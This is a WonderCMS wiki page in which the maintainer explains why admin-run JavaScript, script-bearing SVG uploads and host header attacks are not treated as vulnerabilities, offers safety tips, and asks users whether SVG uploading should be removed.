-
-
Notifications
You must be signed in to change notification settings - Fork 166
[Self attack vulnerabilities] possibilities list
Robert Isoski edited this page Feb 10, 2020
·
2 revisions
The bugs below work only if an admin is logged and is tricked into pasting JavaScript code or uploading SVG's
WonderCMS comes with some security features and some responsibilities.
1. A logged-in user (admin) can execute JavaScript anywhere on their website.
- This has always been a WonderCMS feature.
- I personally don't consider this needs fixing, since a logged-in admin can do much more damage than just XSS attacks (including website defacement, malware distribution, cryptominers, ...)
2. A logged in user can upload a SVG (containing code other than an image, such as JavaScript).
- SVG's are generally not just images, they can also include code such as JavaScript, XML, these are awesome features of SVG's.
- Sanitizing SVG's would partially kill their functionality.
- If there are enough wishes for this action, the SVG uploading functionality can be completely removed from WonderCMS.
- If we already allow JavaScript to be executed at any part of the CMS, would removing the SVG functionality make any difference?
3. Host header attack.
- This will not be considered a vulnerability until we see a live exploit of this (not local).
- Using the Burp Suite Tool to create/show a local attack is not enough, since there needs to be a way to exploit a WonderCMS installation (and not just locally attack one-self).
- Avoid pasting random JavaScript code.
- Avoid uploading random SVG's.
- Install themes and plugins only from wondercms.com
The list above is subject to change. All discussions are welcome. Reporting the above issues/bugs/vulnerabilities will not include you in the WonderCMS reward system.
Comments Trying to think of a reason to counter myself and ask should we remove SVG uploading functionality and why?
- even if we remove SVG uploading, users can still INLINE SVG's with HTML, which is a good thing
- this way we can prevent users being "tricked" into uploading malicious SVG's onto their site, since they can't see the SVG content (if someone tricks them).
Please share your opinion on this topic. TLDR: Remove SVG uploading or not? (even if we remove it, users can inline SVG's)
- please note we would be still supporting executing JavaScript in any part of WonderCMS as we already do.
Still need help?
- Ask a question or make a request in the community.
- Official website
Intro
- Home
- Demo
- Download
- One step install
- Requirements
- 5 file structure
- List of hooks
- Included libraries
- Create theme in 8 easy steps
- Create a plugin
- Custom modules
- Translations
- All security features described
Basic how to's
- Backup all files
- Change default login URL
- Change default password
- Create custom page template
- Create new editable areas or editable blocks
- Edit 404 page
- Get data from database
- Set data to database
- Hide page from menu
- Caddy web server config
- IIS server config
- NGINX server config
- Login
- Recover login URL
- Reset password
- Restore backup
- Update
- PHP built in server
Themes
- Create theme in 8 easy steps
- Add favicon
- Theme tags
- Update theme to work with WonderCMS 2.0.0
- Update theme to work with WonderCMS 3.0.0
- Share your themes with Custom modules
Plugins
- Quick intro on creating plugins and List of hooks
- Share your plugin with simply with Custom modules
Security
- All security features described
- Add SRI tags to your theme libraries
- Always redirect to https and www
- Additional security configuration(s)
- Add SRI tags to your theme libraries
- Better security mode (HTTPS and other features)
Features description
- One click update
- Optional: functions.php file
- Default database.js
- Allowed extensions file types for uploads
- Login URL doesn't work - 404
- 500 internal server error
- Persistent "New WonderCMS update available" message
- URLs mailformed on Windows IIS
- Other errors